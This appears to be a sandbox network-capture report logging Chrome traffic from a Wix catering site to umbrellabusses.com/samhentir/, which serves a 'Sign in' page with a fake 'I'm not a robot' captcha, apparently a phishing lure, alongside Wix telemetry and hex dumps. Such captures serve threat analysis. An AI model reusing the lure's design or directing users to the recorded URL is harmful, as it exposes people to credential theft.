                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC10688OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 6c 6f 61 64 53 69 74 65 46 65 61 74 75 72 65 73 5f 72 65 6e 64 65 72 46 65 61 74 75 72 65 73 4f 6e 6c 79 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 46 49 4e 49 53 48 22 2c 22 74
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"loadSiteFeatures_renderFeaturesOnly","transactionAction":"FINISH","t
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC865INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:52:40 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLn5lbcwSqUINk2keJqOG+T99UuJLvoOY0uBy3RuVN3og,rXUceJIlvIg2Ftogbhjv0NGjlOWHqmFjni9h51Q/cxlEQfi00LSS7LJu7sdkoLsDnfQb7hW5SfXLmPeqZDA33Q==,r6yY0ta7bIKrqK70x072lUn1Hzrz6tRwKV4D+4rztCE=,bOnBQDOCjWxRPsoIciwTIVdnsr1BanTAhliDImTZ9rIZpGNfFoediEkQBVsS0fslE67OCsLnlISxBNdxCuDbsA==
                                                                                                                                                                                                                        x-wix-request-id: 1736517160.471564947339471585887
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        57192.168.2.5498653.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:51 UTC622OUTPOST / HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 2617
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:51 UTC2617OUTData Raw: 7b 22 64 74 22 3a 31 31 36 32 38 2c 22 65 22 3a 5b 7b 22 64 74 22 3a 31 31 36 32 37 2c 22 66 22 3a 7b 22 5f 62 72 61 6e 64 49 64 22 3a 22 77 69 78 22 2c 22 5f 6d 73 22 3a 31 36 36 38 30 2c 22 5f 68 6f 73 74 69 6e 67 50 6c 61 74 66 6f 72 6d 22 3a 22 56 49 45 57 45 52 22 2c 22 73 72 63 22 3a 37 32 2c 22 65 76 69 64 22 3a 31 38 33 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 36 30 39 66 30 34 34 31 2d 32 64 38 63 2d 34 36 34 36 2d 38 34 36 65 2d 32 37 38 62 35 34 61 38 66 35 31 39 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 76 73 69 22 3a 22 34 64 36 66 38 38 39 61 2d 64 37 35 64 2d 34 32 31 36 2d 61
                                                                                                                                                                                                                        Data Ascii: {"dt":11628,"e":[{"dt":11627,"f":{"_brandId":"wix","_ms":16680,"_hostingPlatform":"VIEWER","src":72,"evid":183,"platform":"viewer","sessionId":"609f0441-2d8c-4646-846e-278b54a8f519","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","vsi":"4d6f889a-d75d-4216-a
                                                                                                                                                                                                                        2025-01-10 13:52:51 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:51 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        58192.168.2.549866104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:51 UTC677OUTGET /samhentir/ HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC869INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:52 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3q0vux%2F6%2Baefa4ApIqGoc92blxHuhbEQ9ge%2FpjUJ4GwLHNdY%2FJFsI1wGgSVTJrFdlsEhMDxo%2FqUPgCAFkDnESvZngUeOzYmnIB9oxl1tUqL5sy26%2F9j5EFOAcCvRR0%2BiI0eOmao%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26645b05428f-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2724&min_rtt=2385&rtt_var=1137&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1255&delivery_rate=1224318&cwnd=100&unsent_bytes=0&cid=9c5991778a3bab99&ts=291&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC500INData Raw: 34 32 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 63 73 73 2f 69 6e 69 74 2e 63 73 73 3f 76 3d 31 37 33 36 35 31 37 31 37 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b
                                                                                                                                                                                                                        Data Ascii: 42a<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Sign in</title> <link rel="stylesheet" href="./css/init.css?v=1736517172"> <link
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC573INData Raw: 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 22 20 61 6c 74 3d 22 72 62 69 22 20 63 6c 61 73 73 3d 22 63 6c 6f 73 65 20 72 62 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 72 62 22 20 63 6c 61 73 73 3d 22 72 62 6c 61 62 22 3e 49 27 6d 20 6e 6f 74 20 61 20 72 6f 62 6f 74 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 43 61 70 69 6e 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 62 78 22 3e 0d 0a 20 20
                                                                                                                                                                                                                        Data Ascii: <img src="" alt="rbi" class="close rbo"> </div> <div class="bt2"> <label for="rb" class="rblab">I'm not a robot</label> </div> </div> <div class="boxCapin3"> <div class="imgbx">
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        59192.168.2.54987034.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:51 UTC640OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 596
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:51 UTC596OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 68 69 64 64 65 6e 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 53 54 41 52 54 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 34 64 36 66 38 38 39 61 2d 64 37 35 64 2d 34 32 31 36 2d
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"hidden","transactionAction":"START","sessionId":"4d6f889a-d75d-4216-
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC864INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:52:52 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLjJcNOW2BKP3BIbSfLv0E2mWWveFEnegpnkLxzZh8fhS,rXUceJIlvIg2Ftogbhjv0J2CJKO+iFtV5a/jAtljeBREQfi00LSS7LJu7sdkoLsDgfCyZxMHAPmkB8cBeiookw==,r6yY0ta7bIKrqK70x072ld/8qvwF9aMqTI6Wby2exq8=,bOnBQDOCjWxRPsoIciwTISBwy6ab+7zKmkCm75gx11FER+jYadSkHzyfPeAvTTAuRqgG45efprRyzJifRPvJaw==
                                                                                                                                                                                                                        x-wix-request-id: 1736517172.01956172737223962088
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        60192.168.2.549869104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC580OUTGET /samhentir/css/init.css?v=1736517172 HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC979INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:52 GMT
                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:34:16 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef6f8-593"
                                                                                                                                                                                                                        Expires: Sat, 11 Jan 2025 01:52:52 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: MISS
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QUTvSBDedQumdKwzVs9vVwNWkDOdyosRY2zCGvNcvxzZZEx12rh7yixiMwWtI3hDfretb7d9GeGHVylLgWIqaJJ3BzN1D95ivr%2BUmS83OqdTXclMwt4o%2FkVWETXRiLqFiWpnTsI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26663f8b5e62-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1594&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1158&delivery_rate=1831869&cwnd=139&unsent_bytes=0&cid=b4e4ba0a2bf2df33&ts=492&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC390INData Raw: 35 39 33 0d 0a 2a 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 7d 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 7d 0d 0a 2e 63 61 70 62 6f 78 69 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 74 6f 70 3a 20 34 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c
                                                                                                                                                                                                                        Data Ascii: 593*{ margin: 0; padding: 0; box-sizing: border-box;}body { font-family: 'Segoe UI', sans-serif;}.capboxi{ position: absolute; width: 100%; top: 40% !important; left: 50% !important; transform: transl
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC1044INData Raw: 74 68 3a 20 32 35 25 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 61 75 74 6f 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 34 64 32 64 32 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0d 0a 7d 0d 0a 2e 62 6f 78 43 61 70 69 6e 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 2e 62 6f 78 43 61 70 69 6e 20 6c 61 62 65 6c 7b 0d 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 7d 0d 0a 2e 69 6d 67 74
                                                                                                                                                                                                                        Data Ascii: th: 25%; margin: 30px auto; padding: 10px; background-color: #FAFAFA; border: 1px solid #d4d2d2; border-radius: 3px;}.boxCapin{ display: flex; align-items: center;}.boxCapin label{ cursor: pointer;}.imgt
                                                                                                                                                                                                                        2025-01-10 13:52:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        61192.168.2.549881104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC618OUTGET /samhentir/img/flaretext.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC996INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:53 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:25:20 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef4e0-601"
                                                                                                                                                                                                                        Expires: Sat, 08 Feb 2025 08:24:08 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 106125
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V5BCgvbavZPIlbS8oXv7pFBIdHZh%2BzpDeFdRYT9UKyKrhOjCbQjJAiaNED12LTKHI6oA10EsnZSK8tV37y4nmBtZTccmHDTJgO6Poy0Nu%2B5MXACAgwbZWMprsV%2BRVWAQEGWe3E4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd266c4808c468-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1638&rtt_var=622&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1196&delivery_rate=1746411&cwnd=235&unsent_bytes=0&cid=30a7cbbac6bbf783&ts=150&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC373INData Raw: 36 30 31 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 56 00 00 00 23 08 06 00 00 00 0e b9 fd 85 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 05 96 49 44 41 54 68 43 ed 99 6b 4c 1c 55 14 80 a1 84 42 e0 1f 84 14 92 16 a2 26 8d 21 8d a9 05 34 e5 19 89 90 26 22 9a fe 90 36 2a 45 88 4d 69 90 d0 22 12 25 40 22 04 51 51 a4 01 a3 d0 26 b6 3c 82 54 de 8f 46 41 94 82 98 10 b1 01 12 08 28 20 20 42 0a 42 80 c2 cc ce fc 38 ce 39 eb 1d 66 d7 cb b2 52 36 ba cb fe f8 02 67 ce cc bd 77 3e ce bd 73 67 70 90 24 09 ec ec 3f 76 b1 16 c2 2e d6 42 d8 c5 5a 08 bb 58 0b 71 e0 c4 ea e6 47 40 6c c9 84 ad f7 1e 87 ad 77 fd 60 ab f8 29 10 2a 5f 01 b1 eb 7d
                                                                                                                                                                                                                        Data Ascii: 601PNGIHDRV#sRGBgAMAapHYsodIDAThCkLUB&!4&"6*EMi"%@"QQ&<TFA( BB89fR6gw>sgp$?v.BZXqG@lw`)*_}
